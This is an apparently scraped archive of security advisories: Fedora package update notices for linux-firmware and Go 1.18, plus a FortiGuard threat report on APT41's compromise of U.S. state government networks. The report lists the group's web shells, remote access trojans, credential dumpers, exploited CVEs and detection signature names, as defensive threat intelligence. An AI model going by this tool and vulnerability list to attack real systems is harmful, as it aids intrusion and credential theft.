Category Archives: Advisories

linux-firmware-20220310-130.fc34

Read Time:1 Minute, 5 Second

FEDORA-2022-e5c03af85e

Packages in this update:

linux-firmware-20220310-130.fc34

Update description:

Update to upstream 20220310 linux firmware release:

Update AMD cpu microcode
ath11k: add links for WCN6855 hw2.1
ath11k: WCN6855 hw2.0: add WLAN.HSP.1.1-03125-QCAHSPSWPL_V1_V2_SILICONZ_LITE-3
ath11k: WCN6855 hw2.0: add board-2.bin and regdb.bin
add firmware for MT7986
update firmware for MT7921 WiFi device
update firmware for mediatek bluetooth chip(MT7921)
amdgpu: update picasso/raven/raven2 VCN firmware
amdgpu: Update GPU firmwares to the 21.50 release
amdgpu: add firmware for SDMA 5.2.7 IP block
amdgpu: add firmware for PSP 13.0.8 IP block
amdgpu: add firmware for DCN 3.1.6 IP block
amdgpu: add firmware for GC 10.3.7 IP block
rtw89: 8852a: update fw to v0.13.36.0
iwlwifi: add/Update new FWs from core68-60 release
Update Intel Bluetooth FW for 7265/8260/8265/9260/9462/9560/AX2xx
Update AMD SEV firmware
Mellanox: Add new mlxsw_spectrum firmware xx.2010.1406
rtl_bt: Update RTL8852A BT USB firmware to 0xDFB7_6D7A
rtl_bt: Update RTL8822C BT USB firmware to 0x19B7_6D7D
rtl_bt: Update RTL8822C BT UART firmware to 0x15B7_6D7D
wfx: update to firmware 3.14
wfx: add antenna configuration files

Read More

linux-firmware-20220310-130.fc35

Read Time:1 Minute, 5 Second

FEDORA-2022-1229886987

Packages in this update:

linux-firmware-20220310-130.fc35

Update description:

Update to upstream 20220310 linux firmware release:

Update AMD cpu microcode
ath11k: add links for WCN6855 hw2.1
ath11k: WCN6855 hw2.0: add WLAN.HSP.1.1-03125-QCAHSPSWPL_V1_V2_SILICONZ_LITE-3
ath11k: WCN6855 hw2.0: add board-2.bin and regdb.bin
add firmware for MT7986
update firmware for MT7921 WiFi device
update firmware for mediatek bluetooth chip(MT7921)
amdgpu: update picasso/raven/raven2 VCN firmware
amdgpu: Update GPU firmwares to the 21.50 release
amdgpu: add firmware for SDMA 5.2.7 IP block
amdgpu: add firmware for PSP 13.0.8 IP block
amdgpu: add firmware for DCN 3.1.6 IP block
amdgpu: add firmware for GC 10.3.7 IP block
rtw89: 8852a: update fw to v0.13.36.0
iwlwifi: add/Update new FWs from core68-60 release
Update Intel Bluetooth FW for 7265/8260/8265/9260/9462/9560/AX2xx
Update AMD SEV firmware
Mellanox: Add new mlxsw_spectrum firmware xx.2010.1406
rtl_bt: Update RTL8852A BT USB firmware to 0xDFB7_6D7A
rtl_bt: Update RTL8822C BT USB firmware to 0x19B7_6D7D
rtl_bt: Update RTL8822C BT UART firmware to 0x15B7_6D7D
wfx: update to firmware 3.14
wfx: add antenna configuration files

Read More

linux-firmware-20220310-130.fc36

Read Time:1 Minute, 5 Second

FEDORA-2022-21cd9a78e2

Packages in this update:

linux-firmware-20220310-130.fc36

Update description:

Update to upstream 20220310 linux firmware release:

Update AMD cpu microcode
ath11k: add links for WCN6855 hw2.1
ath11k: WCN6855 hw2.0: add WLAN.HSP.1.1-03125-QCAHSPSWPL_V1_V2_SILICONZ_LITE-3
ath11k: WCN6855 hw2.0: add board-2.bin and regdb.bin
add firmware for MT7986
update firmware for MT7921 WiFi device
update firmware for mediatek bluetooth chip(MT7921)
amdgpu: update picasso/raven/raven2 VCN firmware
amdgpu: Update GPU firmwares to the 21.50 release
amdgpu: add firmware for SDMA 5.2.7 IP block
amdgpu: add firmware for PSP 13.0.8 IP block
amdgpu: add firmware for DCN 3.1.6 IP block
amdgpu: add firmware for GC 10.3.7 IP block
rtw89: 8852a: update fw to v0.13.36.0
iwlwifi: add/Update new FWs from core68-60 release
Update Intel Bluetooth FW for 7265/8260/8265/9260/9462/9560/AX2xx
Update AMD SEV firmware
Mellanox: Add new mlxsw_spectrum firmware xx.2010.1406
rtl_bt: Update RTL8852A BT USB firmware to 0xDFB7_6D7A
rtl_bt: Update RTL8822C BT USB firmware to 0x19B7_6D7D
rtl_bt: Update RTL8822C BT UART firmware to 0x15B7_6D7D
wfx: update to firmware 3.14
wfx: add antenna configuration files

Read More

golang-1.18~rc1-2.fc36

Read Time:21 Second

FEDORA-2022-17d004ed71

Packages in this update:

golang-1.18~rc1-2.fc36

Update description:

The Go 1.18 Release Candidate 1.
It also includes an additional patch that fixes an issue in arm7hl.
This patch was not included in this release but it’s already merged so it will be removed from the package in future releases.

Go 1.18 Release notes: https://tip.golang.org/doc/go1.18

Read More

APT41 Compromised Six U.S. State Government Networks

Read Time:3 Minute, 52 Second

FortiGuard Labs is aware of a report that threat actor APT41 compromised at least six networks belonging to U.S. state governments between May 2021 and February 2022. To gain a foothold into the victim’s network, the threat actor used a number of different attack vectors: exploiting vulnerable Internet facing web applications and directory traversal vulnerabilities, performing SQL injection, and conducting de-serialization attacks. The intent of APT41 appears to be reconnaissance, though how the stolen information is to be used has not yet been determined.Why is this Significant? This is significant because at least six U.S. state government systems were broken into and data exfiltration was performed by APT41 as recent as February 2022 In addition, a zero-day vulnerability in the USAHerds application (CVE-2021-44207) as well as Log4j (CVE-2021-44228), among others, were exploited in the attacksWhat’s the Detail of the Attack?APT41 performed several different ways to break into the targeted networks.In one case, the group exploited a SQL injection vulnerability in a Internet-facing web application. In another case, a then previously unknown vulnerability (CVE-2021-44207) in USAHerds, which is a web application used by agriculture officials to manage animal disease control and prevention, livestock identification and movement. Also, APT41 reportedly started to exploit the infamous Log4j vulnerability (CVE-2021-44228) within hours of Proof-of-Concept (PoC) code becoming available. Patches for both vulnerabilities are available. Once successful in breaking into the victim’s network, the threat actor performed reconnaissance and credential harvesting activities. What is APT41?APT41 is a threat actor who has been active since at least 2012. Also known as TA415, Double Dragon, Barium, GREF and WickedPanda, the group reportedly performs Chinese state-sponsored espionage activities. APT41 targets organizations in multiple countries across a wide range of industries, such as telecommunications, industrial and engineering and think tanks. In 2020, five alleged members of the group were charged by the U.S. Justice Department for hacking more than 100 companies in the United States.What are the Tools Used by APT41?APT41 is known to use the following tools:ASPXSpy – web shell backdoorBITSAdmin – PowerShell cmdlets for creating and managing file transfers.BLACKCOFFEE – backdoor that disguise its communications as benign traffic to legitimate websites certutil – command-line utility tool used for manipulating certification authority (CA) data and components.China Chopper – web shell backdoor that allows attacker to have remote access to an enterprise networkCobalt Strike – a commercial penetration testing tool, which allows users to perform a wide range of activitiesDerusbi – DLL backdoorEmpire – PowerShell post-exploitation agent, which provides a wide range of attack activities to usersgh0st RAT – Remote Access Trojan (RAT)MESSAGETAP – data mining malware Mimikatz – open-source credential dumpernjRAT – Remote Access Trojan (RAT)PlugX – Remote Access Trojan (RAT)PowerSploit – open-source, offensive security framework which allows users to perform a wide range of activitiesROCKBOOT – BootkitShadowPad – backdoorWinnti for Linux – Remote Access Trojan (RAT) for LinuxZxShell – Remote Access Trojan (RAT)Badpotato – open-source tool that allows elevate user rights towards System rightsDustPan – shellcode loader. aka StealthVectorDEADEYE – downloaderLOWKEY – backdoorKeyplug – backdoorWhat are Other Vulnerabilities Known to be Exploited by APT41?APT41 exploited the following, but not restricted to, these vulnerabilities in the past:CVE-2020-10189 (ManageEngine Desktop Central remote code execution vulnerability)CVE-2019-19781 (Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance)CVE-2019-3396 (Atlassian Confluence Widget Connector Macro Velocity Template Injection)CVE-2017-11882 (Microsoft Office Memory Corruption Vulnerability)CVE-2017-0199 (Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows)CVE-2015-1641 (Microsoft Office Memory Corruption Vulnerability)CVE-2012-0158 (MSCOMCTL.OCX RCE Vulnerability)Are Patches Available for those Vulnerabilities?Yes, patches are available for the vulnerabilities.What is the Status of Coverage?FortiGuard Labs has the following AV signature in place for this issue as:Apache.Log4j.Error.Log.Remote.Code.ExecutionFortiGuard Labs provide the following IPS coverage against vulnerabilities exploited by APT41:Apache.Log4j.Error.Log.Remote.Code.Execution (CVE-2021-4104 CVE-2021-45046 CVE-2021-44228)ZOHO.ManageEngine.DC.getChartImage.Remote.Code.Execution (CVE-2020-10189)Citrix.Application.Delivery.Controller.VPNs.Directory.Traversal (CVE-2019-19781)Confluence.Widget.Connector.macro.Path.Traversal (CVE-2019-3396)MS.Office.EQNEDT32.EXE.Equation.Parsing.Memory.Corruption (CVE-2017-11882 CVE-2018-0798 CVE-2018-0802)MS.Office.RTF.File.OLE.autolink.Code.Execution (CVE-2017-0199 CVE-2017-8570)MS.Office.RTF.Array.Out.of.bounds.Memory.Corruption (CVE-2015-1641)MS.Windows.MSCOMCTL.ActiveX.Control.Remote.Code.Execution (CVE-2012-0158)MS.Windows.MSCOMCTL.ActiveX.Control.Code.Execution (CVE-2012-0158)All network IOCs are blocked by the WebFiltering client.

Read More